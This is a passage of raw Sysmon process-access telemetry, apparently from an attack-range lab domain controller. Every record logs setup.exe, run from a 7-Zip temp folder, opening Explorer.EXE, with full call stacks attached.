l+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
